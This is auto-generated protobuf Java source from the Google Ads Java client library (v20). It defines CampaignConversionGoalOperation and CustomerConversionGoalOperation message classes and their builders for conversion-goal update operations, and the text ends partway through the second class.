com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField( com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof( com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.googleads.v20.services.CampaignConversionGoalOperation) { return mergeFrom((com.google.ads.googleads.v20.services.CampaignConversionGoalOperation)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.googleads.v20.services.CampaignConversionGoalOperation other) { if (other == com.google.ads.googleads.v20.services.CampaignConversionGoalOperation.getDefaultInstance()) return this; if (other.hasUpdateMask()) { mergeUpdateMask(other.getUpdateMask()); } switch (other.getOperationCase()) { case UPDATE: { mergeUpdate(other.getUpdate()); break; } case OPERATION_NOT_SET: { break; } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { input.readMessage( getUpdateFieldBuilder().getBuilder(), extensionRegistry); operationCase_ = 1; break; } // case 10 case 18: { input.readMessage( getUpdateMaskFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000001; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int operationCase_ = 0; private java.lang.Object operation_; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public Builder clearOperation() { operationCase_ = 0; operation_ = null; onChanged(); return this; } private int bitField0_; private com.google.protobuf.FieldMask updateMask_; private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> updateMaskBuilder_; /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return Whether the updateMask field is set. */ public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return The updateMask. */ public com.google.protobuf.FieldMask getUpdateMask() { if (updateMaskBuilder_ == null) { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } else { return updateMaskBuilder_.getMessage(); } } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (value == null) { throw new NullPointerException(); } updateMask_ = value; } else { updateMaskBuilder_.setMessage(value); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder setUpdateMask( com.google.protobuf.FieldMask.Builder builderForValue) { if (updateMaskBuilder_ == null) { updateMask_ = builderForValue.build(); } else { updateMaskBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder mergeUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0) && updateMask_ != null && updateMask_ != com.google.protobuf.FieldMask.getDefaultInstance()) { getUpdateMaskBuilder().mergeFrom(value); } else { updateMask_ = value; } } else { updateMaskBuilder_.mergeFrom(value); } if (updateMask_ != null) { bitField0_ |= 0x00000001; onChanged(); } return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder clearUpdateMask() { bitField0_ = (bitField0_ & ~0x00000001); updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMask.Builder getUpdateMaskBuilder() { bitField0_ |= 0x00000001; onChanged(); return getUpdateMaskFieldBuilder().getBuilder(); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { if (updateMaskBuilder_ != null) { return updateMaskBuilder_.getMessageOrBuilder(); } else { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> getUpdateMaskFieldBuilder() { if (updateMaskBuilder_ == null) { updateMaskBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder>( getUpdateMask(), getParentForChildren(), isClean()); updateMask_ = null; } return updateMaskBuilder_; } private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.CampaignConversionGoal, com.google.ads.googleads.v20.resources.CampaignConversionGoal.Builder, com.google.ads.googleads.v20.resources.CampaignConversionGoalOrBuilder> updateBuilder_; /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> * @return Whether the update field is set. */ @java.lang.Override public boolean hasUpdate() { return operationCase_ == 1; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> * @return The update. */ @java.lang.Override public com.google.ads.googleads.v20.resources.CampaignConversionGoal getUpdate() { if (updateBuilder_ == null) { if (operationCase_ == 1) { return (com.google.ads.googleads.v20.resources.CampaignConversionGoal) operation_; } return com.google.ads.googleads.v20.resources.CampaignConversionGoal.getDefaultInstance(); } else { if (operationCase_ == 1) { return updateBuilder_.getMessage(); } return com.google.ads.googleads.v20.resources.CampaignConversionGoal.getDefaultInstance(); } } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> */ public Builder setUpdate(com.google.ads.googleads.v20.resources.CampaignConversionGoal value) { if (updateBuilder_ == null) { if (value == null) { throw new NullPointerException(); } operation_ = value; onChanged(); } else { updateBuilder_.setMessage(value); } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> */ public Builder setUpdate( com.google.ads.googleads.v20.resources.CampaignConversionGoal.Builder builderForValue) { if (updateBuilder_ == null) { operation_ = builderForValue.build(); onChanged(); } else { updateBuilder_.setMessage(builderForValue.build()); } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> */ public Builder mergeUpdate(com.google.ads.googleads.v20.resources.CampaignConversionGoal value) { if (updateBuilder_ == null) { if (operationCase_ == 1 && operation_ != com.google.ads.googleads.v20.resources.CampaignConversionGoal.getDefaultInstance()) { operation_ = com.google.ads.googleads.v20.resources.CampaignConversionGoal.newBuilder((com.google.ads.googleads.v20.resources.CampaignConversionGoal) operation_) .mergeFrom(value).buildPartial(); } else { operation_ = value; } onChanged(); } else { if (operationCase_ == 1) { updateBuilder_.mergeFrom(value); } else { updateBuilder_.setMessage(value); } } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> */ public Builder clearUpdate() { if (updateBuilder_ == null) { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; onChanged(); } } else { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; } updateBuilder_.clear(); } return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> */ public com.google.ads.googleads.v20.resources.CampaignConversionGoal.Builder getUpdateBuilder() { return getUpdateFieldBuilder().getBuilder(); } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v20.resources.CampaignConversionGoalOrBuilder getUpdateOrBuilder() { if ((operationCase_ == 1) && (updateBuilder_ != null)) { return updateBuilder_.getMessageOrBuilder(); } else { if (operationCase_ == 1) { return (com.google.ads.googleads.v20.resources.CampaignConversionGoal) operation_; } return com.google.ads.googleads.v20.resources.CampaignConversionGoal.getDefaultInstance(); } } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CampaignConversionGoal update = 1;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.CampaignConversionGoal, com.google.ads.googleads.v20.resources.CampaignConversionGoal.Builder, com.google.ads.googleads.v20.resources.CampaignConversionGoalOrBuilder> getUpdateFieldBuilder() { if (updateBuilder_ == null) { if (!(operationCase_ == 1)) { operation_ = com.google.ads.googleads.v20.resources.CampaignConversionGoal.getDefaultInstance(); } updateBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.CampaignConversionGoal, com.google.ads.googleads.v20.resources.CampaignConversionGoal.Builder, com.google.ads.googleads.v20.resources.CampaignConversionGoalOrBuilder>( (com.google.ads.googleads.v20.resources.CampaignConversionGoal) operation_, getParentForChildren(), isClean()); operation_ = null; } operationCase_ = 1; onChanged(); return updateBuilder_; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.ads.googleads.v20.services.CampaignConversionGoalOperation) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v20.services.CampaignConversionGoalOperation) private static final com.google.ads.googleads.v20.services.CampaignConversionGoalOperation DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v20.services.CampaignConversionGoalOperation(); } public static com.google.ads.googleads.v20.services.CampaignConversionGoalOperation getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CampaignConversionGoalOperation> PARSER = new com.google.protobuf.AbstractParser<CampaignConversionGoalOperation>() { @java.lang.Override public CampaignConversionGoalOperation parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<CampaignConversionGoalOperation> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CampaignConversionGoalOperation> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v20.services.CampaignConversionGoalOperation getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleads/google-ads-java
35,941
google-ads-stubs-v20/src/main/java/com/google/ads/googleads/v20/services/CustomerConversionGoalOperation.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v20/services/customer_conversion_goal_service.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v20.services; /** * <pre> * A single operation (update) on a customer conversion goal. * </pre> * * Protobuf type {@code google.ads.googleads.v20.services.CustomerConversionGoalOperation} */ public final class CustomerConversionGoalOperation extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v20.services.CustomerConversionGoalOperation) CustomerConversionGoalOperationOrBuilder { private static final long serialVersionUID = 0L; // Use CustomerConversionGoalOperation.newBuilder() to construct. private CustomerConversionGoalOperation(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CustomerConversionGoalOperation() { } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new CustomerConversionGoalOperation(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v20.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v20_services_CustomerConversionGoalOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v20.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v20_services_CustomerConversionGoalOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v20.services.CustomerConversionGoalOperation.class, com.google.ads.googleads.v20.services.CustomerConversionGoalOperation.Builder.class); } private int bitField0_; private int operationCase_ = 0; @SuppressWarnings("serial") private java.lang.Object operation_; public enum OperationCase implements com.google.protobuf.Internal.EnumLite, com.google.protobuf.AbstractMessage.InternalOneOfEnum { UPDATE(1), OPERATION_NOT_SET(0); private final int value; private OperationCase(int value) { this.value = value; } /** * @param value The number of the enum to look for. * @return The enum associated with the given number. * @deprecated Use {@link #forNumber(int)} instead. */ @java.lang.Deprecated public static OperationCase valueOf(int value) { return forNumber(value); } public static OperationCase forNumber(int value) { switch (value) { case 1: return UPDATE; case 0: return OPERATION_NOT_SET; default: return null; } } public int getNumber() { return this.value; } }; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public static final int UPDATE_MASK_FIELD_NUMBER = 2; private com.google.protobuf.FieldMask updateMask_; /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return Whether the updateMask field is set. */ @java.lang.Override public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return The updateMask. */ @java.lang.Override public com.google.protobuf.FieldMask getUpdateMask() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ @java.lang.Override public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } public static final int UPDATE_FIELD_NUMBER = 1; /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> * @return Whether the update field is set. */ @java.lang.Override public boolean hasUpdate() { return operationCase_ == 1; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> * @return The update. */ @java.lang.Override public com.google.ads.googleads.v20.resources.CustomerConversionGoal getUpdate() { if (operationCase_ == 1) { return (com.google.ads.googleads.v20.resources.CustomerConversionGoal) operation_; } return com.google.ads.googleads.v20.resources.CustomerConversionGoal.getDefaultInstance(); } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v20.resources.CustomerConversionGoalOrBuilder getUpdateOrBuilder() { if (operationCase_ == 1) { return (com.google.ads.googleads.v20.resources.CustomerConversionGoal) operation_; } return com.google.ads.googleads.v20.resources.CustomerConversionGoal.getDefaultInstance(); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (operationCase_ == 1) { output.writeMessage(1, (com.google.ads.googleads.v20.resources.CustomerConversionGoal) operation_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(2, getUpdateMask()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (operationCase_ == 1) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(1, (com.google.ads.googleads.v20.resources.CustomerConversionGoal) operation_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(2, getUpdateMask()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v20.services.CustomerConversionGoalOperation)) { return super.equals(obj); } com.google.ads.googleads.v20.services.CustomerConversionGoalOperation other = (com.google.ads.googleads.v20.services.CustomerConversionGoalOperation) obj; if (hasUpdateMask() != other.hasUpdateMask()) return false; if (hasUpdateMask()) { if (!getUpdateMask() .equals(other.getUpdateMask())) return false; } if (!getOperationCase().equals(other.getOperationCase())) return false; switch (operationCase_) { case 1: if (!getUpdate() .equals(other.getUpdate())) return false; break; case 0: default: } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (hasUpdateMask()) { hash = (37 * hash) + UPDATE_MASK_FIELD_NUMBER; hash = (53 * hash) + getUpdateMask().hashCode(); } switch (operationCase_) { case 1: hash = (37 * hash) + UPDATE_FIELD_NUMBER; hash = (53 * hash) + getUpdate().hashCode(); break; case 0: default: } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v20.services.CustomerConversionGoalOperation prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * A single operation (update) on a customer conversion goal. * </pre> * * Protobuf type {@code google.ads.googleads.v20.services.CustomerConversionGoalOperation} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v20.services.CustomerConversionGoalOperation) com.google.ads.googleads.v20.services.CustomerConversionGoalOperationOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v20.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v20_services_CustomerConversionGoalOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v20.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v20_services_CustomerConversionGoalOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v20.services.CustomerConversionGoalOperation.class, com.google.ads.googleads.v20.services.CustomerConversionGoalOperation.Builder.class); } // Construct using com.google.ads.googleads.v20.services.CustomerConversionGoalOperation.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3 .alwaysUseFieldBuilders) { getUpdateMaskFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } if (updateBuilder_ != null) { updateBuilder_.clear(); } operationCase_ = 0; operation_ = null; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.ads.googleads.v20.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v20_services_CustomerConversionGoalOperation_descriptor; } @java.lang.Override public com.google.ads.googleads.v20.services.CustomerConversionGoalOperation getDefaultInstanceForType() { return com.google.ads.googleads.v20.services.CustomerConversionGoalOperation.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v20.services.CustomerConversionGoalOperation build() { com.google.ads.googleads.v20.services.CustomerConversionGoalOperation result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v20.services.CustomerConversionGoalOperation buildPartial() { com.google.ads.googleads.v20.services.CustomerConversionGoalOperation result = new com.google.ads.googleads.v20.services.CustomerConversionGoalOperation(this); if (bitField0_ != 0) { buildPartial0(result); } buildPartialOneofs(result); onBuilt(); return result; } private void buildPartial0(com.google.ads.googleads.v20.services.CustomerConversionGoalOperation result) { int from_bitField0_ = bitField0_; int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000001) != 0)) { result.updateMask_ = updateMaskBuilder_ == null ? updateMask_ : updateMaskBuilder_.build(); to_bitField0_ |= 0x00000001; } result.bitField0_ |= to_bitField0_; } private void buildPartialOneofs(com.google.ads.googleads.v20.services.CustomerConversionGoalOperation result) { result.operationCase_ = operationCase_; result.operation_ = this.operation_; if (operationCase_ == 1 && updateBuilder_ != null) { result.operation_ = updateBuilder_.build(); } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField( com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof( com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.googleads.v20.services.CustomerConversionGoalOperation) { return mergeFrom((com.google.ads.googleads.v20.services.CustomerConversionGoalOperation)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.googleads.v20.services.CustomerConversionGoalOperation other) { if (other == com.google.ads.googleads.v20.services.CustomerConversionGoalOperation.getDefaultInstance()) return this; if (other.hasUpdateMask()) { mergeUpdateMask(other.getUpdateMask()); } switch (other.getOperationCase()) { case UPDATE: { mergeUpdate(other.getUpdate()); break; } case OPERATION_NOT_SET: { break; } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { input.readMessage( getUpdateFieldBuilder().getBuilder(), extensionRegistry); operationCase_ = 1; break; } // case 10 case 18: { input.readMessage( getUpdateMaskFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000001; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int operationCase_ = 0; private java.lang.Object operation_; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public Builder clearOperation() { operationCase_ = 0; operation_ = null; onChanged(); return this; } private int bitField0_; private com.google.protobuf.FieldMask updateMask_; private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> updateMaskBuilder_; /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return Whether the updateMask field is set. */ public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return The updateMask. */ public com.google.protobuf.FieldMask getUpdateMask() { if (updateMaskBuilder_ == null) { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } else { return updateMaskBuilder_.getMessage(); } } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (value == null) { throw new NullPointerException(); } updateMask_ = value; } else { updateMaskBuilder_.setMessage(value); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder setUpdateMask( com.google.protobuf.FieldMask.Builder builderForValue) { if (updateMaskBuilder_ == null) { updateMask_ = builderForValue.build(); } else { updateMaskBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 